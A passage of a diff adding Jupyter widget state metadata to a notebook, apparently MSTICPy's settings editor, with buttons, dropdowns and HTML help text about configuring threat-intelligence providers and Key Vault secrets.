+      "state": {
+       "width": "70%"
+      }
+     },
+     "5c58dcb1f7534f6da17b309bd54c18f3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "75%"
+      }
+     },
+     "5ca6857a0a9a4df197de7e29ffcf2d2c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add",
+       "layout": "IPY_MODEL_e531be2f1ccc4dc2ac27761f34ccb3a6",
+       "style": "IPY_MODEL_667868e9e5ea4e099ebd6505ee8de0ce"
+      }
+     },
+     "5cd3b388af114832919d074f8741c165": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "5df29ce3d4bd4e77b45b00236a597fbc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "5e139a6de7b94b4aae62b5ba74cc2743": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_b3f87df3253e450facc04e76a86b8ebf",
+        "IPY_MODEL_c3eada2a8e8e4685835224b6156557b8",
+        "IPY_MODEL_f65ca0d67bea49cc861564ae02c65c6f"
+       ],
+       "layout": "IPY_MODEL_67268dfc720d4578ad60950c93f7d22e"
+      }
+     },
+     "5ee68e3ae41946bbbec6b7bd62df43a3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_af5ce13a708a4ba89fa0c0232c84e9b1",
+        "IPY_MODEL_1b198209569e4eafb52a5393ec035a5e"
+       ],
+       "layout": "IPY_MODEL_000d3c419ec345e6adaf37ac449f0446"
+      }
+     },
+     "5ef7ccdf266641fe85417f2df660d732": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "5f430ad023bb46cbb1cfd877339ec634": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "5f6b8f199d2944a7a318e256229460e9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "39%"
+      }
+     },
+     "5fa5f80e4a6143a28f09f612f1abee2d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_2b0b36f8b43e4da99760465f472ccfe0",
+        "IPY_MODEL_53e02b3c905d4a8d8aa142cfe5e0e91c",
+        "IPY_MODEL_577051e663a046f0a4c471aec5be2e85",
+        "IPY_MODEL_e177dd8b36024ea4821e47e39a3eaaec"
+       ],
+       "layout": "IPY_MODEL_9aad2abc218449aebfc7d0920fa4542a"
+      }
+     },
+     "5fab1be1fcf84e809f8f41624ad10612": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "98%"
+      }
+     },
+     "5fbb1854a8424957a67eee743b23d443": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "6109978aca0a482ba0127d57c2e82bdc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "612320cfda6343b1ab69179b6ee8e888": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "61393cab34224ebaaa1a4c4d99fee2ba": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "61abd684dff14d30bf45a0adf18cf600": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "61d4629b24ea4bea8eaff7493f8278e2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "63041ab5d58546568f57d0f3ff750c43": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "AnomalousSequence.ipynb",
+        "AzureBlobStorage.ipynb",
+        "AzureSentinelAPIs.ipynb",
+        "Base64Unpack.ipynb",
+        "DataObfuscation.ipynb",
+        "DataUploader.ipynb",
+        "Data_Queries.ipynb",
+        "EventClustering.ipynb",
+        "EventTimeline.ipynb",
+        "FoliumMap.ipynb",
+        "GeoIPLookups.ipynb",
+        "IoCExtract.ipynb",
+        "MDATPQuery.ipynb",
+        "MordorData.ipynb",
+        "MPSettingsEditor.ipynb",
+        "msticpyconfig.yaml",
+        "MSTICpy_Blackhat_Demo_2020.ipynb",
+        "NotebookWidgets.ipynb",
+        "PivotFunctions-Introduction.ipynb",
+        "PivotFunctions.ipynb",
+        "ProcessTree.ipynb",
+        "Splunk-DataConnector.ipynb",
+        "SqlToKql.ipynb",
+        "TimeSeriesAnomaliesVisualization.ipynb",
+        "TIProviders.ipynb",
+        "VirusTotalLookup.ipynb",
+        "VTLookupV3.ipynb"
+       ],
+       "description": "Files",
+       "index": 0,
+       "layout": "IPY_MODEL_84c022d2bd1b4722b416cee134d18eb7",
+       "style": "IPY_MODEL_457c2b4d42974669b4dda31f7a4a79e3"
+      }
+     },
+     "6382a1f897094e169fc5fa5d7df6e823": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_3b50ed86ea4547569a90ad8d03902665",
+       "style": "IPY_MODEL_44d1b7af5ce94561903fb816a5582cfb",
+       "value": "\n    Choose the other components to load when you run nbinit.init_notebook().<br>\n\n    This is related to the QueryProvider auto-load section but the parameters\n    here are different.<br>\n    Available components include the following:<br>\n    (the names in parantheses are the names of the global variables used\n    when creating these components - use theses to perform any operations\n    required on the component.)\n    <ul>\n        <li>TILookup (ti_lookup) - Threat Intelligence lookups</li>\n        <li>GeoIpLookup (geoip) - Geolocation of IP address lookups\n        Note: you must specify which GeoIP Provider you wish to use.\n        </li>\n        <li>Notebooklets (nb) - Load the MSTIC notebooklets package. This must be\n        installed in your notebook environment. You must specificy a default\n        query provider for this component.\n        </li>\n        <li>Pivot (pivot) - Load Pivot functions into entities.</li>\n        <li>AzureData (az_data) - Load the AzureData component. Optionally specify\n        the authentication options you want to use.</li>\n        <li>AzureSentinelAPI (azs_api) - Load the AzureSentinel API component. Optionally\n        specify the authentication options you want to use.</li>\n    </ul>\n\n    The last two components also support a \"connect\" parameter. If this is not\n    set the default is to initiate authentication to the service as soon as\n    the component is loaded. set connect=False to prevent this.\n\n    <br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html#user-defaults' target='_blank' style='color: blue; text-decoration: underline;'>Online: User Defaults</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#autoload-component' target='_blank' style='color: blue; text-decoration: underline;'>Online: Help on this tab</a>"
+      }
+     },
+     "6433e6dc75134267a884a5ee746e271f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "AzureSentinel.ASIHuntOMSWorkspaceV4",
+        "AzureSentinel.CCIS",
+        "AzureSentinel.Centrica",
+        "AzureSentinel.CyberSecuritySoc",
+        "AzureSentinel.Default",
+        "AzureSentinel.RedmondSentinelDemoEnvironment",
+        "LocalData",
+        "AzureSecurityCenter",
+        "Mordor",
+        "SecurityGraph",
+        "Splunk",
+        "MDE"
+       ],
+       "description": "Add item",
+       "index": null,
+       "layout": "IPY_MODEL_6830feb6b601483e910198f0ebf90ade",
+       "style": "IPY_MODEL_5cd3b388af114832919d074f8741c165"
+      }
+     },
+     "64def8e524aa48a0b980bfa5e7b6ee65": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save file",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_23faa484d88a460581c9e216f2d471fb"
+      }
+     },
+     "654e09700c9e4747a7d7b445236701fd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_990460299ce340aa9b563ffff5bb4959",
+        "IPY_MODEL_4f0605db3a1844e08977801bf5f28889"
+       ],
+       "layout": "IPY_MODEL_43dec354419244b7bfccf4eabcd1f4d9"
+      }
+     },
+     "655da3aba6ca42649b5057dafd467ffd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "65d6b71187784b8391d19063427d27db": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "667868e9e5ea4e099ebd6505ee8de0ce": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "66ba75228df14e3fa9613bc3b7f12f42": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "67268dfc720d4578ad60950c93f7d22e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "6748e6bcf99841d4a56800f49759bc70": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "..",
+        ".ipynb_checkpoints",
+        "Kqlmagic_temp_files",
+        "__pycache__",
+        "data",
+        "kqlmagic"
+       ],
+       "description": "Folders",
+       "index": 0,
+       "layout": "IPY_MODEL_fc3dfaf231994e489f194fbbe758fe37",
+       "style": "IPY_MODEL_d99fae102fec400bb21cfef866a24633"
+      }
+     },
+     "681e717b03e849828894b88db5d3e3ba": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "6830feb6b601483e910198f0ebf90ade": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "6a250732b9bf468dbabed46fd402cee8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "6af4f0fef2fc4c21b38d02e6773ca11c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "6b25495742264e58b7a1f38b967efd90": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "6b83b8bed3d443098b7842c46d883491": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "6c1726aebd5744139b2224117afd4e48": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "50%"
+      }
+     },
+     "6c8e47ffb370450289fdb260bfc639a6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "6d7fccedc45e46e1bd6ce182446b31b0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "6d8a381063bf423d9ef86472462a907f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Current file",
+       "layout": "IPY_MODEL_2b8456d0ff9245619e0c5c41e337264e",
+       "style": "IPY_MODEL_ce96e0b83aa74cd8b07e3bd2d8e23f72",
+       "value": "E:\\src\\asi-jupyter\\notebooks\\config.json"
+      }
+     },
+     "6e2fcfed40664e3f994de7982b2fdf36": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Value of MSTICPCONFIG",
+       "disabled": true,
+       "layout": "IPY_MODEL_2b8456d0ff9245619e0c5c41e337264e",
+       "style": "IPY_MODEL_ce815b30937d4710a15f8eeb7336f6fa",
+       "value": "e:\\src\\microsoft\\msticpyconfig.yaml"
+      }
+     },
+     "6ea20439d77e4e6199861f8ec14ede0c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "6eb28a00d025431fb8668f2dddbeb025": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Results",
+       "index": null,
+       "layout": "IPY_MODEL_dd459d65c4b549b49e2ee3ac7d15df93",
+       "style": "IPY_MODEL_9b1048ade96740f5a40804478612f5b5"
+      }
+     },
+     "6f07b67292ee4223b96a75b6e95a05e8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "6f1ccaaf9e434fec84ab4cf2b2031bef": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "6f4b5deb9d1c452e8b880824040d9656": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_09e4401dd9cc40c59272a269c96ffcff",
+        "IPY_MODEL_e94f302ee2d74244b5651d252b74d761",
+        "IPY_MODEL_0bd2627f17fe4aee808e88be607d6c77"
+       ],
+       "layout": "IPY_MODEL_e4b8e1a0671a42bfaeed971f7df99e01"
+      }
+     },
+     "702f85766e69418aaefd04f2217abc59": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "7058977d363e42779eb6539bab0c27ac": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "7127ef4f430b45838a60d54d94644788": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "71c6580cd52441f79d6d6aa0edd1689b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Load default",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_161eadfc4a3c41479a5af495b43b7fc2"
+      }
+     },
+     "720106934cc440649b7e242c97cebde7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "72ba18e8eef14be58479f02b100b5e52": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Search",
+       "layout": "IPY_MODEL_28dca0927c614547b5b4d916373cfeb0",
+       "style": "IPY_MODEL_fece5cef3c134fd5bdcff82d4088e689"
+      }
+     },
+     "737390d7f11e44628699d38bc4941b87": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "737ad83f14a049e692f695a1f3c7d2c9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "73c1db82519a406e818d97cffe1b67fc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_167bc44f4cf749fa84d59af05f7cf21c",
+       "style": "IPY_MODEL_4b872f5468a04761a444205a05d90821",
+       "value": "\nSelect a provider to edit its settings.<br>\nTo add a new provider, select the name from the \"Add prov\" drop-down and click \"Add\"<br>\n\nThe Storage option tells the settings module to look for the\nvalue in one of three places:\n<ul>\n    <li>Text - this is the usual way to store values that are not sensitive</li>\n    <li>Environment Var - Type the name of variable in the text box</li>\n    <li>Key Vault - use this for sensitive data like passwords and API keys<br>\n    The KeyVault value here can be left empty (the secret name is generated\n    from the settings path), can contain a secret name or can contain a\n    path {vaultname}/{secretname}\n    </li>\n</ul>\n\n<b>Note:</b> Storing values in KeyVault requires some work on your part<br>\nYou must do the following:\n<ol>\n    <li>Create the Key Vault</li>\n    <li>Add the settings for the Vault in the KeyVault section of the configuration</li>\n    <li>Add the values that you want to use to the Vault</li>\n</ol>\nThe Key Vault Configuration link below describes this setup and how you can\nconfigure your Key Vault settings and transfer secrets settings from your\nconfiguration file to a vault.\n<br><a href='https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html#configuration-file' target='_blank' style='color: blue; text-decoration: underline;'>Online: Threat Intel Providers</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html#specifying-secrets-as-key-vault-secrets' target='_blank' style='color: blue; text-decoration: underline;'>Online: Key Vault Configuration</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html' target='_blank' style='color: blue; text-decoration: underline;'>Online: MSTICPy Configuration</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#adding-threat-intelligence-ti-providers' target='_blank' style='color: blue; text-decoration: underline;'>Online: Help on this tab</a>"
+      }
+     },
+     "742edb1b5fa245e0b3fbe8b817c55708": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "751d2a67bca242e28bcf2c5f55dc558c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_b65cf1c78ac94418ad231cec3a950aa3",
+        "IPY_MODEL_5bb26128a8b4456daf3c2c4f3942ce84",
+        "IPY_MODEL_6433e6dc75134267a884a5ee746e271f"
+       ],
+       "layout": "IPY_MODEL_0c14a900b0064a53ab7b08551adae2db"
+      }
+     },
+     "757ec5abc932475cb9607d2b141992e7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_6d8a381063bf423d9ef86472462a907f",
+        "IPY_MODEL_45a5f71d72dd42baa25cb51ac888ba3e"
+       ],
+       "layout": "IPY_MODEL_8c6a1c6bb9124cd6bb7abe62945461f7"
+      }
+     },
+     "75a190bb22064f0ead73801fafa25e11": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "visibility": "hidden"
+      }
+     },
+     "75f713decd474fbfad61635108533541": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_a8bc147dae634b679fd9eab8517c0235",
+       "style": "IPY_MODEL_c66266a337754982a41467da14df341b"
+      }
+     },
+     "7685bbbb84834f3980a1224a1a434117": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "76ce889dfeb948bf86d143ea64785b0e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "77a0d61f20ff4ebb99db9d42fe68afa9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "78669e5c5d3249b9a5fc6a3acf613566": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_92f892b71765482d965296d710228805",
+        "IPY_MODEL_f3ddf795738345aba2d3e51a7d6a698a"
+       ],
+       "layout": "IPY_MODEL_b268967eeffd416fb0668898ec3d32aa"
+      }
+     },
+     "787e319c9e4f49d1ab41b5dab06e0958": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Select File",
+       "layout": "IPY_MODEL_233c9ef671354133a499f4c859d351c1",
+       "style": "IPY_MODEL_a8e1a611b41f41ae97ee2d4f01f43715"
+      }
+     },
+     "78d5f95909364288aa5517f4b7d15a21": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "7947c79c054a47d2a3ae91ad52385400": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Reload settings",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_d62c56e08da342189ec2ef20acdb8389"
+      }
+     },
+     "7974ea6b96b8491d958a56cc0cc41135": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "7a0e5c25fa80447c9908e3639e84550e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "7b32d76ea7a9413b84f9f8813692cf0e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "7b349f868be24ba296f1a979484050a4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Search"
+       },
+       "children": [
+        "IPY_MODEL_00952db18b2d4de398fe9f5723ac7640"
+       ],
+       "layout": "IPY_MODEL_2227d621e8484dbc8735b5ee41e636ab",
+       "selected_index": null
+      }
+     },
+     "7b4fd7bba6f84d209c2f764123cfa4b7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "SubscriptionId",
+       "layout": "IPY_MODEL_1f2f704c99c14428a081a7d241746a6f",
+       "style": "IPY_MODEL_da68216168364a19bc790c48bfe1fdba"
+      }
+     },
+     "7c0b2ec73e5b4511bf23ce3fdbf0661c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "7c6b2b0f10b042338c81539890997b96": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Show Key Vault secrets",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_ef76e7fdf2a541f39360d7559616f2c5"
+      }
+     },
+     "7d11821ac9cb4a4782c949c85e97816a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_18a3ea5f250e443d88557adcc9a21abf",
+        "IPY_MODEL_e8236bbdfa57450b832c3eabe99dc561"
+       ],
+       "layout": "IPY_MODEL_bc24f4f4dddf4e9db6ad2f69fdeb9357"
+      }
+     },
+     "7d200713cb614a2895cec6b75ddc0310": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "7d7a5baafeeb4d1e9de080deb7c9d6e2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_cb4f058bec364c14a31886a9edbb7410"
+       ],
+       "layout": "IPY_MODEL_aa67d309b87f405e8bbebc50bcc295e8"
+      }
+     },
+     "7efd206c0cdd4234b726066fb3aa3256": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "99%"
+      }
+     },
+     "7f3dcf86b4f1438288c2ef93db33a855": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "99%"
+      }
+     },
+     "7f9d623507a2454eb8870f0de8496faf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_61abd684dff14d30bf45a0adf18cf600",
+       "style": "IPY_MODEL_570c99ee69554277b2e2742d15a59340",
+       "value": "Operations"
+      }
+     },
+     "8026898077a54e35b403a37f4cea98bd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Load file",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_7127ef4f430b45838a60d54d94644788"
+      }
+     },
+     "80b28adc931145658bcb038a13976f93": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Open folder",
+       "layout": "IPY_MODEL_175a5b22d56d4712a111bc58fd46ef62",
+       "style": "IPY_MODEL_c3fbbc8d8d7b4946b7f40561606c0ffd"
+      }
+     },
+     "80b95eee94a1435285c48a43cea7ec10": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "815243e08d1c4aa881b07de4447b5cba": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_f930285c8b734951bd10cd87d0911432",
+        "IPY_MODEL_b9dbd3d5a2df4e2b886a0bce483aee1a"
+       ],
+       "layout": "IPY_MODEL_3e3ef467f4854cecb279674433629250"
+      }
+     },
+     "8199433b842b4acab63b6be747ea68a6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "98%"
+      }
+     },
+     "8287dff8e3ac44f4bda3c88370a44987": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "8422aeaba9bf4ace8c73d8ea036aabfc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "8427f84db4cc4966994dda4d46c93339": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "843a9515cd8046818c0ccf34f402b762": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_7974ea6b96b8491d958a56cc0cc41135",
+       "style": "IPY_MODEL_cede4b1270ba43e79da91ccdd62777df",
